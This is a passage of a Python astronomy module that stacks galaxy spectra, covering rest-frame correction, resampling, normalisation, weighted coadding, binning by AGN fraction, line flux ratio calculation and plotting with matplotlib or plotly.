itertools.product(np.arange(nbx), np.arange(nby)):\n if n_array[y, x] > 0:\n ax.text(edgex[x] + (edgex[x + 1] - edgex[x]) / 2, edgey[y] + (edgey[y + 1] - edgey[y]) / 2,\n str(n_array[y, x]),\n fontsize=7, horizontalalignment='center', verticalalignment='center', color='white')\n\n ax.set_xticks(edgex[::3])\n ax.set_yticks(edgey)\n fig.savefig(fname_base + '.pdf', dpi=300, bbox_inches='tight')\n plt.close()\n elif backend == 'plotly':\n if not colormap:\n colormap = 'plasma'\n if not labels:\n xlabel = binx if not logx else '$\\\\log(' + binx + ')$'\n ylabel = biny if not logy else '$\\\\log(' + biny + ')$'\n zlabel = binz if not logz else '$\\\\log(' + binz + ')$'\n else:\n xlabel, ylabel, zlabel = labels\n fig = plotly.graph_objects.Figure(\n data=plotly.graph_objects.Heatmap(x=edgex, y=edgey, z=z_array,\n colorbar=dict(title=zlabel), colorscale=colormap)\n )\n for x, y in itertools.product(np.arange(nbx), np.arange(nby)):\n if n_array[y, x] > 0:\n fig.add_annotation(text=str(n_array[y, x]), xref=\"x\", yref=\"y\",\n x=edgex[x] + (edgex[x + 1] - edgex[x]) / 2,\n y=edgey[y] + (edgey[y + 1] - edgey[y]) / 2, showarrow=False,\n font=dict(size=7, color=\"white\"))\n fig.update_yaxes(\n scaleratio=1,\n showgrid=False,\n zeroline=False,\n showline=True,\n linewidth=1,\n linecolor='black',\n mirror=True,\n ticks='inside',\n tickwidth=2,\n tickcolor='black',\n ticklen=10,\n title_text=ylabel\n )\n fig.update_xaxes(\n showgrid=False,\n zeroline=False,\n showline=True,\n linewidth=1,\n linecolor='black',\n mirror=True,\n ticks='inside',\n tickwidth=2,\n tickcolor='black',\n ticklen=10,\n title_text=xlabel\n )\n\n fig.update_layout(\n template='plotly_white',\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n # fig.update_layout(\n # paper_bgcolor='rgba(0,0,0,0)',\n # plot_bgcolor='rgba(0,0,0,0)'\n # )\n fig.write_html(fname_base + '.html', include_mathjax=\"cdn\")\n # fig.write_image(fname_base + '.pdf')\n\n def kewley_agn_class(self, bpt_1, bpt_2):\n for i, ispec in enumerate(self):\n self[ispec].k01_agn_class(bpt_1, bpt_2)\n\n # Allow the class to be called as a way to perform the stacking\n @utils.timer(name='Stack Procedure')\n def __call__(self, bin_name=None, nbins=None, bin_size=None, log=False, round_bins=None, auto_norm_region=True,\n bpt_1=None, bpt_2=None, hbin_target=3, stack_all_agns=False):\n \"\"\"\n The main procedure for stacking spectra. Performs all necessary steps at once:\n 1. Convert each spectra to their rest-frame wavelengths using their redshifts.\n 2. Correct each spectra's flux for galactic extinction.\n 3. Find the optimal, universal wavelength grid that is in a region shared by all spectra and with uniform\n spacing.\n 4. Resample each spectrum in the dictionary onto the universal grid, while conserving flux and flux error.\n 5. Normalize each spectrum to the median value in the normalization region.\n 6. Coadd each spectrum together using 1/error^2 as the weights at each pixel value.\n 7. Coadd the errors for each spectrum together again using 1/error^2 as the weights at each pixel value.\n\n :param bin_name: optional, str\n The name of a quantity to bin the data by before stacking each bin. Must exist in each Spectrum's data\n dictionary.\n :param nbins: optional, int\n The number of bins to use.\n If 'bin' is specified, then one of 'nbins' or 'bin_size' must also be specified.\n :param bin_size: optional, float\n The size of each bin.\n If 'bin' is specified, then one of 'nbins' or 'bin_size' must also be specified.\n :param log: optional, boolean\n If True, takes the log10 of the bin quantity BEFORE binning. 'nbins' and 'bin_size' should be specified\n according to the log10 of the bin quantity.\n :param round_bins: optional, float\n If specified, rounds the bin edges / bin sizes to be multiples of this quantity.\n :param auto_norm_region: optional, boolean\n If True, automatically calculates the normalization region for each stacked bin. Otherwise, uses the default\n value specified by the norm_region instance attribute.\n :param bpt_1: optional, str\n The name of the BPT x-value to be used if 'stack_all_agns' is True. Must exist in each Spectrum's data\n dictionary.\n :param bpt_2: optional, str\n The name of the BPT y-value to be used if 'stack_all_agns' is True. Must exist in each Spectrum's data\n dictionary.\n :param hbin_target: int\n The targeted minimum number of galaxies to include in the highest bin, if stacking by AGN distance, where\n the distance is in relation to an arbitrary reference point that we have the freedom to choose.\n Default is 3.\n :param stack_all_agns: boolean\n If True, uses the Kewley et al. 2001 AGN criteria as a cutoff and stacks ALL galaxies that satisfy this\n criteria together. Mutually incompatible with 'bin' and its related arguments.\n\n :return None:\n \"\"\"\n self.correct_spectra()\n self.filter_spectra()\n self.universal_grid = []\n self.stacked_flux = []\n self.stacked_err = []\n if stack_all_agns:\n if not bpt_1 or not bpt_2:\n raise ValueError(\"Must specify BPT ratio keys if stacking all AGNs!\")\n\n # Calculate the statistic to cut by and get the spectra that qualify\n spectra = np.array([], dtype=str)\n for i, ispec in enumerate(self):\n agn = self[ispec].k01_agn_class(bpt_1, bpt_2)\n if agn:\n spectra = np.append(spectra, ispec)\n\n # Stack only the qualified spectra\n if len(spectra) == 0:\n self.universal_grid.append(None)\n self.stacked_flux.append(None)\n self.stacked_err.append(None)\n return\n\n wave_grid_b, spectra = self.uniform_wave_grid(spectra)\n self.resample(wave_grid_b, spectra)\n if auto_norm_region:\n nr0, nr1 = self.calc_norm_region(wave_grid_b)\n else:\n nr0, nr1 = self.norm_region\n self.normalize(wave_grid_b, (nr0, nr1), spectra)\n if self.wave_criterion == 'strict':\n wave_grid_b, flux_b, err_b = self.coadd(wave_grid_b, spectra)\n elif self.wave_criterion == 'lenient':\n wave_grid_b, flux_b, err_b, specnames_fb, specnames_eb, nspec_fb, nspec_eb = \\\n self.coadd(wave_grid_b, spectra, save_specnames=True)\n self.specnames_f.append(specnames_fb)\n self.specnames_e.append(specnames_eb)\n self.nspec_f.append(nspec_fb)\n self.nspec_e.append(nspec_eb)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n self.universal_grid.append(wave_grid_b)\n self.stacked_flux.append(flux_b)\n self.stacked_err.append(err_b)\n\n elif bin_name:\n if bin_name == 'agn_frac':\n\n if not bpt_1 or not bpt_2:\n raise ValueError(\"Must specify BPT ratio keys if binning by AGN fraction!\")\n\n # First find the optimal point to use as a reference point\n dx = np.zeros(len(self))\n dy = np.zeros(len(self))\n for i, ispec in enumerate(self):\n dx[i], dy[i] = self[ispec]._calc_agn_dist(bpt_1, bpt_2, ref_point=(0, 0))\n\n # Solve for the optimal reference point so the highest bin has at least 3 spectra\n def num_in_highest_bin(ref_point_shift, target_num, bin_size=None, nbins=None, round_bins=None):\n ref_point = (np.nanmax(dx), np.nanmax(dy)) + ref_point_shift\n agn_fracs = np.zeros(len(self))\n # Now calculate the AGN fractions using this distance\n for i, ispec in enumerate(self):\n agn_fracs[i] = self[ispec].calc_agn_frac(bpt_1, bpt_2, ref_point=ref_point)\n # Normalize so that the largest AGN frac is 1\n max_frac = np.nanmax(agn_fracs)\n agn_fracs /= max_frac\n\n minbin = np.nanmin(agn_fracs)\n maxbin = 1\n if nbins and not bin_size:\n bin_size = (maxbin - minbin) / nbins\n if round_bins:\n rating = 1 / round_bins\n bin_size = np.round(bin_size * rating) / rating\n if bin_size == 0:\n bin_size = round_bins\n counts = len(np.where(agn_fracs >= 1 - bin_size)[0])\n\n print('Current number in highest bin: %03d' % counts, end='\\r', flush=True)\n if counts > target_num:\n return 0\n else:\n return -1 * counts\n\n # USE POWELL METHOD\n print('Optimizing AGN fraction reference point...')\n min_res = scipy.optimize.minimize(num_in_highest_bin, 0,\n args=(hbin_target, bin_size, nbins, round_bins), method='Powell')\n shift = min_res.x\n print('\\n')\n\n # Calculate final AGN fractions from the optimized reference point\n ref_point = (np.nanmax(dx), np.nanmax(dy)) + shift\n agn_fracs = np.zeros(len(self))\n for i, ispec in enumerate(self):\n agn_fracs[i] = self[ispec].calc_agn_frac(bpt_1, bpt_2, ref_point=ref_point)\n max_frac = np.nanmax(agn_fracs)\n for i, ispec in enumerate(self):\n agn_fracs[i] /= max_frac\n self[ispec].data[\"agn_frac\"] = agn_fracs[i]\n self.agn_ref_pt = ref_point\n\n binned_spectra, bin_counts, bin_edges = self.bin_spectra(bin_name, bin_size=bin_size, nbins=nbins, log=log,\n round_bins=round_bins)\n nn = len(binned_spectra)\n for i, b in enumerate(binned_spectra):\n print(f'BIN {i + 1} OF {nn}...')\n spectra = binned_spectra[b]\n if len(spectra) == 0:\n self.universal_grid.append(None)\n self.stacked_flux.append(None)\n self.stacked_err.append(None)\n continue\n wave_grid_b, spectra = self.uniform_wave_grid(spectra)\n self.resample(wave_grid_b, spectra)\n if auto_norm_region:\n nr0, nr1 = self.calc_norm_region(wave_grid_b)\n else:\n nr0, nr1 = self.norm_region\n self.normalize(wave_grid_b, (nr0, nr1), spectra)\n if self.wave_criterion == 'strict':\n wave_grid_b, flux_b, err_b = self.coadd(wave_grid_b, spectra)\n elif self.wave_criterion == 'lenient':\n wave_grid_b, flux_b, err_b, specnames_fb, specnames_eb, nspec_fb, nspec_eb = \\\n self.coadd(wave_grid_b, spectra, save_specnames=True)\n self.specnames_f.append(specnames_fb)\n self.specnames_e.append(specnames_eb)\n self.nspec_f.append(nspec_fb)\n self.nspec_e.append(nspec_eb)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n self.universal_grid.append(wave_grid_b)\n self.stacked_flux.append(flux_b)\n self.stacked_err.append(err_b)\n self.binned = bin_name\n self.binned_spec = binned_spectra\n self.bin_counts = bin_counts\n self.bin_edges = bin_edges\n else:\n wave_grid, _ = self.uniform_wave_grid()\n self.resample(wave_grid)\n if auto_norm_region:\n nr0, nr1 = self.calc_norm_region(wave_grid)\n else:\n nr0, nr1 = self.norm_region\n self.normalize(wave_grid, (nr0, nr1))\n if self.wave_criterion == 'strict':\n wave_grid, flux, err = self.coadd(wave_grid)\n elif self.wave_criterion == 'lenient':\n wave_grid, flux, err, specnames_f, specnames_e, nspec_f, nspec_e = \\\n self.coadd(wave_grid, save_specnames=True)\n self.specnames_f.append(specnames_f)\n self.specnames_e.append(specnames_e)\n self.nspec_f.append(nspec_f)\n self.nspec_e.append(nspec_e)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n self.universal_grid.append(wave_grid)\n self.stacked_flux.append(flux)\n self.stacked_err.append(err)\n self.binned = None\n self.binned_spec = None\n self.bin_counts = None\n self.bin_edges = None\n\n def correct_spectra(self):\n \"\"\"\n Spectra.correct_spectra method now using the instance attribute self.r_v as the argument\n\n :return None:\n \"\"\"\n print('Correcting spectra to rest-frame wavelengths and adjusting for galactic extinction...')\n super().correct_spectra(r_v=self.r_v)\n\n def uniform_wave_grid(self, binned_spec=None):\n \"\"\"\n Create a uniform grid of wavelengths with spacing gridspace, covering only the regions where all spectra in\n the dictionary overlap.\n\n :param binned_spec: iterable\n A list of spectra names to use. If None, all are used.\n :return wave_grid:\n The universal wave grid.\n \"\"\"\n print('Calculating a universal wave grid...')\n all_names = binned_spec if binned_spec is not None else np.array([s for s in self], dtype=np.str)\n binned_indices = np.array([self.get_spec_index(name) for name in all_names], dtype=int)\n wave = self.to_numpy('wave')['wave'][binned_indices]\n if self.wave_criterion == 'strict':\n wmin = None\n wmax = None\n removed_names = np.array([], dtype=int)\n for i, wi in enumerate(wave):\n remove = False\n if self.norm_region:\n if np.where((self.norm_region[0] - 5 < wi) & (self.norm_region[0] + 5 > wi))[0].size == 0 or \\\n np.where((self.norm_region[1] - 5 < wi) & (self.norm_region[1] + 5 > wi))[0].size == 0:\n remove = True\n if not remove:\n if not wmin or not wmax:\n wmin = np.nanmin(wi)\n wmax = np.nanmax(wi)\n continue\n imin = np.nanmin(wi)\n if imin > wmin:\n if np.abs(imin - wmin) > self.tolerance:\n remove = True\n else:\n wmin = imin\n imax = np.nanmax(wi)\n if imax < wmax:\n if np.abs(imax - wmax) > self.tolerance:\n remove = True\n else:\n wmax = imax\n if remove:\n print(\n f\"WARNING: Removing spectrum {i + 1}: {all_names[i]} due to insufficient wavelength coverage.\")\n del self[all_names[i]]\n removed_names = np.append(removed_names, i)\n all_names = np.delete(all_names, removed_names)\n elif self.wave_criterion == 'lenient':\n wmin = 1e100\n wmax = -1e100\n for i, wi in enumerate(wave):\n imin = np.nanmin(wi)\n imax = np.nanmax(wi)\n if imin < wmin:\n wmin = imin\n if imax > wmax:\n wmax = imax\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n\n wave_grid = np.arange(int(wmin), int(wmax) + self.gridspace, self.gridspace)\n return wave_grid, all_names\n\n def resample(self, wave_grid, binned_spec=None):\n \"\"\"\n Resample the current spectra to a new, uniform wavelength grid while preserving flux and error across the\n interpolation.\n\n :param wave_grid: np.ndarray\n The grid of wavelengths to resample to.\n :param binned_spec: iterable\n A list of spectra names to use. If None, all are used.\n :return None:\n \"\"\"\n print('Resampling spectra over a uniform wave grid...')\n ss = binned_spec if binned_spec is not None else [s for s in self]\n range_ = tqdm.tqdm(ss) if self.progress_bar else ss\n for ispec in range_:\n self[ispec].flux, self[ispec].error = \\\n maths.spectres(wave_grid, self[ispec].wave, self[ispec].flux,\n self[ispec].error, fill=np.nan,\n verbose=False if self.wave_criterion == 'lenient' else True)\n self[ispec].wave = wave_grid\n print('Done.')\n\n def normalize(self, wave_grid, norm_region, binned_spec=None):\n \"\"\"\n Normalize all spectra by the median of the normalization region.\n\n :param wave_grid: np.ndarray\n The grid of wavelengths to resample to.\n :param norm_region: tuple\n The left and right edges of wavelength to normalize by.\n :param binned_spec: iterable\n A list of spectra names to use. If None, all are used.\n :return None:\n \"\"\"\n print('Normalizing spectra...')\n # Use the first spectra's wave since by this point they should all be equal anyways,\n # to calculate the region to fit\n reg = np.where((norm_region[0] < wave_grid) & (wave_grid < norm_region[1]))[0]\n ss = binned_spec if binned_spec is not None else [s for s in self]\n range_ = tqdm.tqdm(ss) if self.progress_bar else ss\n for ispec in range_:\n self[ispec].flux, self[ispec].error = self._norm(self[ispec].flux, self[ispec].error, reg)\n self[ispec]._normalized = True\n print('Done.')\n\n @staticmethod\n @njit\n def _norm(data, error, region):\n med = np.nanmedian(data[region])\n data_out = data / med\n error_out = error / med\n return data_out, error_out\n\n # def _renorm_stack(self, norm_region):\n # \"\"\"\n # Renormalize the stacked spectra and all individual spectra within each stack to a new normalization region.\n #\n # :param norm_region: tuple\n # The new lower and upper limits for the region to normalize by.\n # :return None:\n # \"\"\"\n # for i in range(len(self.stacked_flux)):\n # reg = np.where((norm_region[0] < self.universal_grid[i]) & (self.universal_grid[i] < norm_region[1]))[0]\n # med = np.nanmedian(self.stacked_flux[i][reg])\n # self.stacked_flux[i] /= med\n # if self.binned_spec:\n # ss = self.binned_spec[i]\n # else:\n # ss = self\n # for ispec in ss:\n # medi = np.nanmedian(self[ispec].flux[reg])\n # self[ispec].flux /= medi\n\n def coadd(self, wave_grid, binned_spec=None, save_specnames=False):\n \"\"\"\n Coadd all spectra together into a single, stacked spectrum, using 1/sigma**2 as the weights.\n\n :param wave_grid: np.ndarray\n The grid of wavelengths to resample to.\n :param binned_spec: iterable\n A list of spectra names to use. If None, all are used.\n :param save_specnames: bool\n Whether or not to save the names and numbers of spectra that are coadded at each wavelength point.\n :return None:\n \"\"\"\n stacked_flux = np.zeros_like(wave_grid, dtype=np.float64)\n stacked_err = np.zeros_like(wave_grid, dtype=np.float64)\n\n print('Coadding spectra...')\n ss = binned_spec if binned_spec is not None else [s for s in self]\n specnames_f = np.ndarray(wave_grid.size, dtype=object)\n specnames_e = np.ndarray(wave_grid.size, dtype=object)\n nspec_f = np.zeros_like(wave_grid)\n nspec_e = np.zeros_like(wave_grid)\n range_ = tqdm.trange(len(wave_grid)) if self.progress_bar else range(len(wave_grid))\n for i in range_:\n flux_i = np.array([self[name].flux[i] for name in ss])\n err_i = np.array([self[name].error[i] for name in ss])\n if save_specnames:\n specnames_f[i] = np.array([name for name in ss if np.isfinite(self[name].flux[i])])\n specnames_e[i] = np.array([name for name in ss if np.isfinite(self[name].error[i])])\n nspec_f[i] = specnames_f[i].size\n nspec_e[i] = specnames_e[i].size\n if len(ss) > 1:\n stacked_flux[i], stacked_err[i] = self._coadd_flux_err(flux_i, err_i)\n else:\n stacked_flux[i], stacked_err[i] = flux_i, err_i\n\n good = np.where(np.isfinite(stacked_flux) & np.isfinite(stacked_err))[0]\n print('Done.')\n if save_specnames:\n return wave_grid[good], stacked_flux[good], stacked_err[good], specnames_f[good], specnames_e[good], \\\n nspec_f[good], nspec_e[good]\n else:\n return wave_grid[good], stacked_flux[good], stacked_err[good]\n\n @staticmethod\n @njit\n def _coadd_flux_err(flux, error):\n weights = 1 / error ** 2\n M = len(np.where(weights > 0)[0])\n if np.isnan(flux).all() or np.isnan(error).all() or M <= 1:\n return np.nan, np.nan\n stacked_flux = np.nansum(flux * weights) / np.nansum(weights)\n stacked_err = np.sqrt(\n np.nansum((flux - stacked_flux) ** 2 * weights) / ((M - 1) / M * np.nansum(weights))\n )\n # stacked_err = np.sqrt(1/np.nansum(weights))\n return stacked_flux, stacked_err\n\n @utils.timer(name='Line Flux Integration')\n def calc_line_flux_ratios(self, line, dw=5, tag='', sky_lines=None, sky_penalty=False, save=False, conf=None, path=''):\n \"\"\"\n Calculate the F-number of each spectrum: F = mean flux / RMS of the surrounding spectrum.\n :param line: float, int\n The center wavelength at which to integrate (angstroms).\n :param dw: float, int\n The distance to the left/right of the center wavelength to integrate (angstroms).\n :param tag: string\n An optional tag string to add to the end of saved file names.\n :param sky_lines: optional, list\n Wavelengths of sky lines to watch out for -- flag if the line is close to a sky line.\n :param save: boolean\n If True, saves the line flux ratios as a toml file.\n :param conf: str\n Key for a confidence parameter in each spectrum's dictionary to compare to the line flux ratios.\n :param path: str\n Output path for the toml file if 'save' is True.\n :return out: dict\n Dictionary of keys: spectra names, and values: tuple(integrated flux, error) / stacked spectrum integrated\n flux.\n \"\"\"\n if sky_lines is None:\n sky_lines = [5578.5, 5894.6, 6301.7, 7246.0]\n out = {}\n confs = {}\n info = {}\n self.correct_spectra()\n # if len(self.universal_grid) == 0:\n # raise ValueError(\"Stacked spectrum has not yet been generated!\")\n # self._renorm_stack((line-norm_dw, line+norm_dw))\n range_ = tqdm.trange(len(self)) if self.progress_bar else range(len(self))\n\n # The reference regions need to be adjusted for certain lines since other lines are at +/-30 angstroms and\n # can bias the result.\n _wr = 30\n _wl = 30\n if 5275 < line < 5277:\n _wr += 55\n elif 5302 < line < 5304:\n _wl += 30\n _wr += 30\n elif 5308 < line < 5310:\n _wl += 30\n _wr += 30\n elif 5334 < line < 5336:\n _wl += 55\n elif 5719 < line < 5721:\n _wr += 30\n for i in range_:\n # Define wavelength windows\n window_center = (self[i].wave > line - dw) & (self[i].wave < line + dw)\n window_left = (self[i].wave > line - dw - _wl) & (self[i].wave < line + dw - _wl)\n window_right = (self[i].wave > line - dw + _wr) & (self[i].wave < line + dw + _wr)\n\n if len(window_center) < int(2 * dw) or len(window_left) < int(2 * dw) or len(window_right) < int(2 * dw):\n print(f\"WARNING: {self[i].name} spectrum does not have sufficient wavelength coverage in the\"\n f\" integration region.\")\n continue\n bad = ~np.isfinite(self[i].flux) | ~np.isfinite(self[i].wave)\n if len(np.where(bad & window_center)[0]) >= 3 or len(np.where(bad & window_left)[0]) >= 3 or len(\n np.where(bad & window_right)[0]) >= 3:\n print(f\"WARNING: {self[i].name} spectrum does not have sufficient wavelength coverage in the \"\n f\"integration region.\")\n continue\n # window_center = np.where(window_center)[0]\n window_left = np.where(window_left)[0]\n window_right = np.where(window_right)[0]\n\n # Normalize stack in the region of interest\n window_full = np.where((self[i].wave > line - dw - _wl) & (self[i].wave < line + dw + _wr))[0]\n flux_norm, err_norm = self._norm(self[i].flux, self[i].error, window_full)\n\n # Calculate a linear trend\n mean_left = np.nanmean(flux_norm[window_left])\n mean_right = np.nanmean(flux_norm[window_right])\n slope = (mean_right - mean_left) / (_wl + _wr)\n intercept = mean_left - slope * (line - _wl)\n\n full_wave = self[i].wave[window_full]\n y = slope * full_wave + intercept\n\n # Detrend with the line\n full_flux = flux_norm[window_full] - y\n\n # Calculate mean / RMS\n window_lr = np.where(((full_wave > line - dw - _wl) & (full_wave < line + dw - _wl)) | (\n (full_wave > line - dw + _wr) & (full_wave < line + dw + _wr)))[0]\n window_center = np.where((full_wave > line - dw) & (full_wave < line + dw))[0]\n rms = np.sqrt(np.mean(full_flux[window_lr] ** 2))\n\n # The 0 key is for compatibility with older versions\n out[self[i].name] = (np.mean(full_flux[window_center]) / rms).astype(np.float64)\n # Sigma-clipping to find the width of the line in pixels\n info[self[i].name] = {}\n npix = np.where(full_flux[window_center] >= 3*rms)[0]\n cont = np.where(np.diff(npix) < 2)[0]\n # pixels = len(cont) + 1 if np.diff(npix)[-1] in np.diff(npix)[cont] else len(cont)\n goodpix = [] if len(npix) == 0 else npix[np.concatenate((cont, [-1]))]\n info[self[i].name]['npix'] = len(goodpix)\n for _line in sky_lines:\n rest = maths.cosmological_redshift(_line, self[i].redshift)\n info[self[i].name][f'sky_flag_{_line}'] = 1 if np.abs(rest - line) <= 2*dw else 0\n if conf:\n confs[self[i].name] = self[i].data[conf]\n\n if sky_penalty and self[i].sky is not None:\n # Repeat the F-ratio procedure for the sky flux\n sky_norm, sky_err = self._norm(self[i].sky, self[i].error, window_full)\n mean_left = np.nanmean(sky_norm[window_left])\n mean_right = np.nanmean(sky_norm[window_right])\n slope = (mean_right - mean_left) / (_wl + _wr)\n intercept = mean_left - slope * (line - _wl)\n\n y = slope * full_wave + intercept\n\n full_sky = sky_norm[window_full] - y\n\n rms = np.sqrt(np.mean(full_sky[window_lr] ** 2))\n\n out[self[i].name] -= (np.mean(full_sky[window_center]) / rms).astype(np.float64)\n\n if conf:\n confs[self[i].name] = self[i].data[conf]\n\n # breakpoint()\n\n # OLD INTEGRATION METHOD, DEPRECATED, COMPARING WITH STACK:\n # for i in range(len(self.universal_grid)):\n # print(f\"BIN {i+1} of {len(self.universal_grid)}...\")\n # cspline_stack = scipy.interpolate.CubicSpline(self.universal_grid[i], self.stacked_flux[i],\n # extrapolate=False)\n #\n # baseline, err = scipy.integrate.quad(cspline_stack.__call__, line-dw, line+dw)\n # out[i] = {\"stack\": (baseline, err)}\n # confs[i] = {}\n # if self.binned_spec:\n # ss = self.binned_spec[i]\n # else:\n # ss = self\n # print('Calculating relative line flux ratios...')\n # range_ = tqdm.tqdm(ss) if self.progress_bar else ss\n # for ispec in range_:\n # good = np.isfinite(self[ispec].wave) & np.isfinite(self[ispec].flux) & np.isfinite(self[ispec].error)\n # region = (line-dw < self[ispec].wave) & (self[ispec].wave < line+dw)\n # bad = ~np.isfinite(self[ispec].error) | ~np.isfinite(self[ispec].flux) |\n # ~np.isfinite(self[ispec].wave)\n # if len(np.where(bad & region)[0]) >= 3:\n # print(f\"WARNING: {ispec} spectrum has undefined datapoints in the line region! \"\n # f\"Cannot calculate relative line flux.\")\n # continue\n # good = np.where(good)[0]\n # csplinei = scipy.interpolate.CubicSpline(self[ispec].wave[good], self[ispec].flux[good],\n # extrapolate=False)\n # intflux, erri = scipy.integrate.quad(csplinei.__call__, line-dw, line+dw)\n # out[i][ispec] = (intflux/baseline, err/baseline)\n # if conf:\n # confs[i][ispec] = self[ispec].data[conf]\n # print('Done.')\n\n if save:\n with open(path + os.sep + 'line_flux_ratios_' + str(line) + '_' + tag + '.toml', 'w') as handle:\n toml.dump(out, handle, encoder=toml.TomlNumpyEncoder())\n with open(path + os.sep + 'line_flux_info_' + str(line) + '_' + tag + '.toml', 'w') as handle:\n toml.dump(info, handle, encoder=toml.TomlNumpyEncoder())\n if conf:\n return _wl, _wr, out, confs, info\n else:\n return _wl, _wr, out, info\n\n def plot_stacked(self, fname_base, emline_color=\"rebeccapurple\", absorp_color=\"darkgoldenrod\", cline_color=\"cyan\",\n cline_labels='all', backend='plotly'):\n \"\"\"\n Plot the stacked spectrum.\n\n :param fname_base: str\n The path and file name to save the figure to.\n :param emline_color: str\n If backend is 'pyplot', this specifies the color of the plotted emission lines. Default is 'rebeccapurple'.\n :param absorp_color: str\n If backend is 'pyplot', this specifies the color of the plotted absorption lines. Default is\n 'darkgoldenrod'.\n :param cline_color: str\n If backend is 'pyplot', this specifies the color of the plotted coronal lines. Default is 'cyan'.\n :param cline_labels: str, list\n Which coronal line labels to include. If 'all', include all labels. Applies only if backend is 'plotly'.\n :param backend: str\n May be 'pyplot' to use the pyplot module or 'plotly' to use the plotly module for plotting. Default is\n 'plotly'.\n :return None:\n \"\"\"\n format0 = '.html' if backend == 'plotly' else '.pdf'\n assert self.universal_grid is not None, \"Universal grid has not yet been calculated!\"\n assert self.stacked_flux is not None, \"Stacked flux has not yet been calculated!\"\n assert self.stacked_err is not None, \"Stacked error has not yet been calculated!\"\n\n for bin_num in range(len(self.universal_grid)):\n format1 = '_' + str(bin_num) + format0\n fname = fname_base + format1\n wave = self.universal_grid[bin_num]\n flux = self.stacked_flux[bin_num]\n err = self.stacked_err[bin_num]\n if wave is None or flux is None or err is None:\n continue\n\n # Plot the spectrum and error\n if backend == 'pyplot':\n if self.wave_criterion == 'strict':\n fig, ax = plt.subplots(figsize=(40, 10))\n ax.set_xlabel(r'$\\lambda_{\\rm{rest}}$ ($\\rm{\\AA}$)', fontsize=20)\n elif self.wave_criterion == 'lenient':\n gs = gridspec.GridSpec(nrows=20, ncols=20)\n fig = plt.figure(constrained_layout=True)\n ax = fig.add_subplot(gs[0:18, :18])\n ax.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False) # labels along the bottom edge are off\n ax2 = fig.add_subplot(gs[19, :18], sharex=ax)\n ax2.set_xlabel(r'$\\lambda_{\\rm{rest}}$ ($\\rm{\\AA}$)', fontsize=20)\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n linewidth = .5\n linestyle = '--'\n ax.plot(wave, flux, '-', color='k', lw=linewidth)\n ax.fill_between(wave, flux - err, flux + err, color='mediumaquamarine', alpha=0.5)\n if self.wave_criterion == 'lenient':\n extent = [wave[0] - (wave[1] - wave[0]) / 2., wave[-1] + (wave[1] - wave[0]) / 2., 0, 1]\n nspec = ax2.imshow(self.nspec_f[bin_num][np.newaxis, :], aspect='auto', cmap='plasma',\n extent=extent)\n fig.colorbar(nspec, cax=fig.add_subplot(gs[:, 19]), label='Number of Galaxies')\n\n # Plot emission and absorption lines\n\n # OVI, Ly-alpha, NV, OI, CII, SiIV, SiIV/OIV, CIV, HeII\n # OIII, AlIII, CIII, CII, NeIV, MgII, NeV, NeVI, [OII]\n # [OII], H-delta, H-gamma, [OIII], H-beta, [OIII], [OIII], [OI], [OI]\n # [FeX], [NII], H-alpha, [NII], [SII], [SII], [FeXI]\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6549.860, 6564.610, 6585.270, 6718.290, 6732.670])\n\n for line in emlines:\n ax.axvline(line, color=emline_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n\n # Ne V, Ne V*, Fe VII, Fe V, Fe V, Ne III (not coronal), Fe V, Fe VII, Fe VI, Fe VII, Fe VI, Fe VII,\n # Fe XIV, Ca V, Fe VI, Ar X, Fe VII, Fe VII*, Fe X, Fe XI\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n for line in clines:\n ax.axvline(line, color=cline_color, lw=linewidth * 2, linestyle=linestyle, alpha=0.75)\n\n # Ca K, Ca H, Mg1b, Na, CaII, CaII, CaII\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in abslines:\n ax.axvline(line, color=absorp_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n\n # Set up axis labels and formatting\n fontsize = 20\n ax.set_ylabel(r'$f_\\lambda$ (normalized)', fontsize=fontsize)\n ax.set_title('%s' % 'Stacked Spectrum', fontsize=fontsize)\n ax.tick_params(axis='both', labelsize=fontsize - 2)\n ax.set_xlim(np.nanmin(wave), np.nanmax(wave))\n ax.set_ylim(0., np.nanmax(flux) + .3)\n\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n plt.close()\n elif backend == 'plotly':\n fig = plotly.subplots.make_subplots(rows=1, cols=1)\n linewidth = .5\n if self.wave_criterion == 'lenient':\n fig.add_trace(\n plotly.graph_objects.Heatmap(x=wave, y=np.array([0] * len(wave)), z=self.nspec_f[bin_num],\n colorbar=dict(title='Number of spectra'),\n name='Number of Spectra', showlegend=False))\n text = [str(self.nspec_f[bin_num][i]) for i in range(len(self.nspec_f[bin_num]))]\n elif self.wave_criterion == 'strict':\n text = [str(len(self)) for _ in range(len(self.stacked_flux[bin_num]))]\n else:\n raise ValueError('invalid value for self.wave_criterion!')\n good = np.where(np.isfinite(flux) & np.isfinite(err))[0]\n fig.add_trace(plotly.graph_objects.Scatter(x=wave, y=flux, line=dict(color='black', width=linewidth),\n name='Data', showlegend=False, text=text,\n hovertemplate='%{y} Number of Spectra: %{text}'))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(flux + err)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n name='Upper 